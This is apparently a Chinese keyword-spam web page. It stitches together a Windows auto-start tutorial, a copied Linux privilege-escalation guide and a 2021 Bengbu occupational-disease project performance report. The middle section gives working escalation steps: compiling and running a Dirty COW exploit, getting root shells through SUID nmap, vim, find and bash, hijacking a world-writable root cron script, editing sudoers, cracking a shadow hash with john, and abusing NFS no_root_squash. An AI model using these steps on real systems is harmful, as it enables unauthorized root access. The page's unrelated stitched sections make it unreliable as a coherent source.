今天给各位分享2021年度蚌埠市民生工程(职业病防治) 项目绩效评价报告的知识,其中也会对2021年度蚌埠市民生工程(职业病防治) 项目绩效评价报告进行解释,如果能碰巧解决你现在面临的问题,别忘了关注本站,现在开始吧!
2021年度蚌埠市民生工程(职业病防治) 项目绩效评价报告的介绍就聊到这里吧,感谢你花时间阅读本站内容,更多关于2021年度蚌埠市民生工程(职业病防治) 项目绩效评价报告、2021年度蚌埠市民生工程(职业病防治) 项目绩效评价报告的信息别忘了在本站进行查找喔。
本文导读目录:
3、2021年度蚌埠市民生工程(职业病防治) 项目绩效评价报告
因为每个人都打开了计算机的目的,所以每个人都打开的软件,程序是不同的。但是,如果您使用计算机工作,请打开计算机将始终打开固定的软件程序。因此,我学会了设置启动启动,我每次都不必手动打开,设置它。我将开始所有你想要的程序。一切都准备好了。 第一个:设置启动项 1、找到启动文件夹,我的是C:UsersThinkPadAppDataRoamingMicrosoftWindowsStart MenuProgramsStartup,或者打开运行,输入shell:startup,回车,也可以快速打开启动文件夹。 2,将快捷方式复制到需要引导到此文件夹的程序。 3,开放任务管理器 - 开始查看启动项。 这设置了,程序将在计算机启动时自动启动。 第二:使用计划的任务开始 1.新文本文件debugstart.txt,打开以下内容: tasklist|find /i “authSender.exe” && echo started || start “” “D:DebugauthSender.exe”。 这条语句不能换行, authSender.exe 是程序名, “D:DebugauthSender.exe”是此程序所在路径,tasklist|find /i “authSender.exe”是判断进程是否存在,程序是否已经开启,如未开启才会启动程序,然后改后缀名 .txt 为 .bat,双击即可启动程序。(可以在每条语句前使用 :: 来注释一条语句),这种方法还可以批量启动不同程序,只需要在此文件中重启一行,按相同格式写第二个要启动的程序对应的语句即可。 2.输入任务规划程序窗口以创建任务。 然后选择“触发”选项卡,选择“新建”,选择“登录”(启动任务时启动任务时启动任务,您在启动任务时需要管理员权限),单击“确定”。由于我们的BAT脚本有判断,因此您不必担心程序将开始多次。 选择“新建”,然后选择“启动选项”,然后选择“入门选项”,然后选择“启动选项”,然后单击“确定”,然后单击“确定”(创建任务界面)。 关闭页面,您可以启动启动自动启动程序。 1、内核漏洞脏牛提权 查看内核版本信息 uname -a 具体提权 1、信息收集配合kali提权 uname -a #查看内核版本信息 内核版本为3.2.78,那我们可以搜索该版本漏洞 searchsploit linux 3.2.78 找到几个可以使用的脏牛提权脚本,这里我使用的是40839.c脚本 那我们把这个文件也进行上传 然后在我们反弹的shell上查看,发现上传成功。 我们可以先看看脚本 利用提示对脚本进行编译 gcc -pthread 40839.c -o 40839 -lcrypt 运行然后输入密码即可 接下来我们通过 su firefart #切换用户 2、利用linux-exploit-suggester、linux-exploit-suggester-2等工具 linux-exploit-suggester linux-exploit-suggester-2 2、SUID配置错误提权 SUID简介 1.只有可以执行的二进制程序文件才能设定SUID权限,非二进制文件设置SUID权限没任何意义. 2.命令执行者要对该程序文件拥有执行(x)权限. 3.命令执行者在执行该程序时获得该程序文件属主的身份. 4.SUID权限只在该程序执行过程中有效,也就是说身份改变只在程序执行过程中有效 SUID设置方法 1、chmod u+s FILE... 2、chmod u-s FILE… 具体提权 SUID可以让程序调用者以文件拥有者的身份运行该文件,当我们以一个普通用户去运行一个root用户所有的SUID文件,那么运行该文件我们就可以获取到root权限 常见Linux中root文件列表如下 nmap vim find bash more less nano cp 利用如下POC #以下命令将尝试查找具有root权限的SUID的文件,不同系统适用于不同的命令 find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000-print2>/dev/null find / -user root -perm -4000-exec ls -ldb {} \; 各命令提权利用 nmap 旧版本的 Nmap(2.02 到 5.21)具有交互模式,允许用户执行 shell 命令。由于 Nmap 位于以 root 权限执行的二进制文件列表中,因此可以使用交互式控制台来运行具有相同权限的 shell。 nmap --interactive #启动交互模式 nmap> !sh sh-3.2# whoami root 或者有一个 Metasploit 模块,它通过 SUID Nmap 二进制文件执行权限提升。 exploit/unix/local/setuid_nmap find 实用程序find可用于发现存储在系统上。然而,它是执行命令的能力。因此,如果它被配置为使用 SUID 权限运行,那么所有将通过 find 执行的命令都将以 root 身份执行。 我们拿到一个非root权限 touch abc find abc -exec whoami \; vim Vim 的主要用途是作为文本编辑器。但是,如果它作为 SUID 运行,它将继承 root 用户的权限,因此它可以读取系统上的所有文件。 vim.tiny /etc/shadow 还可以通过vim来打开shell vim.tiny # Press ESC key :set shell=/bin/sh :shell Bash bash -p bash-3.2# id uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service) less和more less /etc/passwd !/bin/sh 3、计划任务提权 系统内可能会有一些定时执行的任务,一般这些任务由crontab来管理,具有所属用户的权限。非root权限的用户是不可以列出root用户的计划任务的。但是/etc/内系统的计划任务可以被列出。 利用命令如下命令列出一些计划任务 ls -l /etc/cron* cat /etc/crontab 在发现有一些计划任务时,我们就可以去检查是否存在一些问题导致权限的提升 权限配置不当 首先我们拿到一个非root用户的账号,我们通过一些其他的手段提权都失败了,这个时候我们查看了一下计划任务 cat /etc/crontab 发现存在一个root身份运行的test.sh,那我们当相应的目录下去查看一下这个计划任务 cd /sbin;ls -l test.sh 发现这里权限配置为777,就是说我们普通用户也能去修改这个test.sh文件,那我们对文件进行修改,然后进行提权。 cp /bin/bash /tmp/bash; chmod u+s /tmp/bash; 接下来就到/tmp等待计划任务的执行 产生后对bash文件进行执行即可进行提权 4、sudo提权 普通用户一般是无法运行root所有者的命令的,运用sudo可以使普通用户使用root用户的命令。但是在一些场景下,管理员为了平常运营方便给sudoer文件配置不当,从而导致权限提升的问题产生。 一般情况下,我们使用sudo命令都需要输入root密码 管理可能为了方便对/etc/sudoers进行编辑成sudo免密码 vim /etc/sudoers 添加:test ALL=(ALL:ALL) NOPASSWD:ALL #test为我们的用户 添加后我们在进行重新进行读取 5、明文root密码提权 大多数linux系统的密码都和/etc/passwd和/etc/shadow这两个配置文件息息相关。passwd里面储存了用户,shadow里面是密码的hash。出于安全考虑passwd是全用户可读,root可写的。shadow是仅root可读写的。 当我们的passwd和shadow一些权限配置不当就可能会导致提权 passwd文件 test:x:1000:1000::/home/test:/bin/bash passwd 由冒号分割,第一列是用户名,第二列是密码,x 代表密码 hash 被放在 shadow 里面了(非root用户不可读)。 当我们的passwd文件给普通用户配置了写权限,那么我们就可以通过修改x为一段已知的密码的hash值来进行提权。 shadow文件 test:$6$Mqh9T8ip$4Ev.HJTBdyobrYaW/KzBlL0yx6wefeB.VDcE7KiDiwoUvGkqShU9jRK4cEZA2kBRsyH2fWjmbxc/ZyVWfXwFJ/:18849:0:99999:7::: 假如我们对shadow文件有读取权限我们就可以利用hash、john等对其进行爆破 这里以john为例进行演示,首先把passwd和shadow两文件放在同一文件下 john --user=test test.hash 6、密码复用提权 当我们获取到一些如数据库、后台 web 密码,可能就是 root 密码 7、第三方服务提权 netstat -antup #查看各种网络服务 1、NFS提权 当服务器中存在NFS共享,且开启了no_root_squash选项时,这时如果客户端使用的是root用户,那么对于共享目录来说,该客户端就有root权限,可以使用它来提升权限。 ①查看NFS服务器上的共享目录 sudo showmount -e x.x.x.x ②创建本地挂载目录,挂载共享目录。使用攻击者本地root权限创建Suid shell。 sudo mkdir -p /tmp sudo mount -t nfs x.x.x.x:/home/test /tmp cp /bin/bash /tmp/shell chmod u+s /tmp/shell ③回到要提权的服务器上,使用普通用户使用shell -p来获取root权限。 2、数据库提权(篇幅教长,后续另起篇幅) ①UDF提权 ②MOF提权 ③启动项提权 ④CVE-2016-6663、CVE-2016-6664组合提权 ⑤反弹端口提权 原文地址:最详细Linux提权总结(建议收藏) - 随风kali - 博客园 根据省卫生健康委、省财政厅《关于印发2021安徽省卫生健康民生工程绩效评价办法的通知》等文件要求,我市持续加强职业病预防控制,有效保障劳动者职业健康权益。现将有关工作情况汇报如下。 一、明确目标任务 1.我市对此项工作设计依据充分。根据《职业病防治法》《安徽省2021年卫生健康民生工程绩效评价办法》《蚌埠市人民政府关于2021年实施33项民生工程的通知》(蚌政〔2021〕44号)等,将项目绩效目标细化分解为具体的绩效指标,如我市对照省级工作方案,分解任务,明确各责任单位所承担职业健康检查网报、职业病危害因素申报、职业危害因素现场检测等的目标任务数。 2.项目工作部署科学,在相关项目实施方案中,具体指标值清晰、可衡量,如具体数据报送完成率、现场检测完成率、网络报告及时率及合格率等,均予以具体赋值,这样使得各责任单位的工作任务、目的明确。 3.安排实施的项目与年度任务数相对应,我市的项目工作计划均按照省级计划任务数制定,在工作推进过程中,紧盯目标任务,各项指标任务均保质保量的完成,并且部分指标超额完成,如重点职业病监测信息报告率。 4.项目实施资金与预算确定的项目资金量相匹配,我市及时制定了资金预算,按照相关资金使用要求开展工作,上级资金到款后,及时足额下拨,为有效开展工作提供保障。 二、工作完成情况 (一)建立和落实项目工作管理制度。 1.制定了项目实施办法。在上级文件、方案下发后,我市在认真研究的基础上制定了《2021年蚌埠市职业病防治项目工作实施方案》(蚌卫疾控〔2021〕44号)。制定方案,不仅是形式上的贯彻,更是确保工作实施过程中更加具有可操作性型,更加规范。 2.项目实施办法合法、合规、完整。在蚌埠市卫健委、蚌埠市财政局联合下发的实施方案时,充分考虑相关法律法规,逐条对照,确保方案符合依法依规实行,在方案中各子项目都对各县区、各部门、各单位的职责和任务加以明确,不仅如此,为了保障项目的顺利实施,还会结合本市实际,将可能存在的困难及解决方式考虑进去,把针对性的措施写入方案。通过各种方法确保实施办法的合法、合规、完整。 (二)项目工作制度执行有效。 1.严格执行审批程序,按照相关规定进行申请、审核和审批。项目执行过程中,所有需要审核、审批程序的,我们均严格按照有关程序要求,向上级主动进行申请,在上级审核、审批后,再执行,所有事项均做到合法、合规。 2.建立项目工作小组,明确具体负责人员,及时跟踪工作进展情况。在下发的项目实施方案中,设立了工作领导小组和技术专家组,明确了人员职责,及时跟踪项目开展情况。 3.开展人员培训。为推动全市职业病防治项目工作,8月17日,我市召开“2021年职业卫生防治相关项目推进会”,各市、县(区)疾控中心相关科室负责人和业务骨干20余人参加了培训,市疾控中心组织人员对2012年度方案进行了解读,分析了2020年重点职业病工作开展情况、存在问题,对2021年监测工作进行部署,使各县区、各部门充分了解项目的执行过程,切实明确自身任务分工及其重要意义、日常工作关键点、注意事项等。10月29日,由市卫健委组织,市疾控中心承办的“全市职业病防治工作推进会暨项目培训班”在市疾控中心召开,各县区卫生健康委职业健康相关科室负责人、卫生监督执法部门和疾控中心负责人或分管领导、职业卫生业务骨干共计40余人参加了会议,市卫健委相关科室负责人对下一步工作特别是监管部门如何利用监测结果加大监管力度进行了指示。 12月份,为深入实施职业健康保护行动,进一步夯实职业健康工作基础,强化主体责任,提升蚌埠市职业病防治能力,我市组织开展了蚌埠市职业病防治能力提升培训,通过本次培训加强了职业卫生知识宣传,有效提升了监管部门、职业健康服务机构和用人单位的职业病防治能力,全面提高了蚌埠市的职业健康工作质量和水平,以更好地贯彻落实《国家职业病防治规划》(2021-2025)的文件精神。 4.落实督导检查,有力推进工作。自8月下旬起,我市各职业病防治项目各实施部门每周均需上报进度表,不断增强大家完成监测任务的紧迫性。为进一步了解并推动我市各种职业病防治项目进度,10月中旬起,在市卫生健康委的组织带领下,市疾控中心相关专业人员对各县区疾控中心、职业健康体检机构、职业病诊断机构开展了一次全面督导,督导采用座谈、现场资料查询等方式,内容包括工作制度、经费配备、人员设置、工作实绩等。此次督导范围包括全部9个县区(含2个功能区)、10个职业健康体检机构、2个职业病诊断机构,覆盖率100%。两种措施的实施促使民生工程职业健康体检个案卡的上报率大幅度提升,大大推动了职业病防治民生工程的进度,至12月底,已上报体检个案卡8205份,超额完成省下达的4800条的任务数,任务完成率达170.94%。 5.实施质量控制,规范监测行为。为加强蚌埠市职业健康检查和职业病诊断的质量控制和管理,蚌埠市成立了职业健康检查质量控制中心,挂靠在专科医院—蚌埠市职业病防治院,与安徽省职业健康质控中心保持一致性。人员涵盖了市疾控中心、市卫健委执法支队、市职防院、综合医院的职业卫生、职业健康体检、职业病诊断专家。质控中心纳入蚌埠市医疗质控中心统一管理,在市卫健委职能部门和质控部门的共同指导和管理下,在各部门的共同配合下,开展蚌埠市职业健康检查和职业病诊断质量控制、督导考核工作。2021年共开展4次专项督导和1次全面考核工作。每次开展质控督查前,均做好周密计划,对质控的内容、质控实施计划、质控单位以及质控专家的都经过质控中心管理组讨论确定。对每次考核的结果,针对性地提出整改意见和建议,发送整改通知书,组织专家“回头看”,督导复核整改结果。有力地促进各职业健康检查机构和职业病诊断机构加强内部质量管理,规范地开展工作。 6.及时准确报送资料。对于上级部门所需上报的材料,我们均积极精心准备,严格把关,做到了及时报送,并保证所有材料齐全、真实、准确。 (三)项目资金落实到位率和及时率均为100%,且有市级配套资金。 1.本年度落实到项目的实际到位资金满足项目实施要求。中央财政拨款已及时足额下拨至我市各项目单位,为了更加保证我市职业病防治项目的开展,蚌埠市政府配套了45万元专项资金,这体现出了我市对职业病防治工作的高度重视,为我市职业病防治工作的开展提供了有力的财政保障。 2.所有项目资金专款专用。项目启动初期制定了资金使用方案,严格按照上级有关文件的资金规范使用要求,保证做到专款专用,在项目执行过程中,及时进行督导检查,确保资金使用规范。 (四)项目产出 2021年我市共上报重点职业病监测信息8205条,重点职业病监测完成率为170.94%。超额完成上级下达的目标任务。 (五)项目效益 职业病防治工作的实施产生了巨大的社会效益:一是密切了各项目实施部门之间的关系;二是开展数据共享,为监管部门确定工作重点和政府制定职业病防治政策提供参考;三是增强了用人单位加强职业管理,履行保护本单位职工职业健康权益职责的意识;四是提高了广大职工学习职业病防治知识,加强自我防护的积极性和主动性等。 四、评价依据 1.关于印发2021年安徽省卫生健康民生工程绩效评价办法的通知 2.关于印发安徽省2021年基本公共卫生服务职业病防治项目实施方案的通知 3.安徽省财政厅 安徽省卫生健康委员会关于清算调整2021年中央及省级基本公共卫生服务补助资金的通知 4. 《蚌埠市人民政府关于2021年实施33项民生工程的通知》(蚌政〔2021〕44号) 5.蚌埠市民生工作领导小组办公室关于印发《蚌埠市2021年33项民生工程实施方案(运行方案)》的通知(蚌民生办〔2020〕8号) 6. 蚌埠市民生工作领导小组办公室关于印发《蚌埠市2021年33项民生工程资金管理办法》的通知(蚌民生办〔2021〕9号)。 2022年1月13日2021年度蚌埠市民生工程(职业病防治) 项目绩效评价报告的介绍就聊到这里吧,感谢你花时间阅读本站内容,更多关于2021年度蚌埠市民生工程(职业病防治) 项目绩效评价报告、2021年度蚌埠市民生工程(职业病防治) 项目绩效评价报告的信息别忘了在本站进行查找喔。
未经允许不得转载! 作者:谁是谁的谁,转载或复制请以超链接形式并注明出处。
原文地址:http://96gps.cn/post/19968.html发布于:2026-03-03
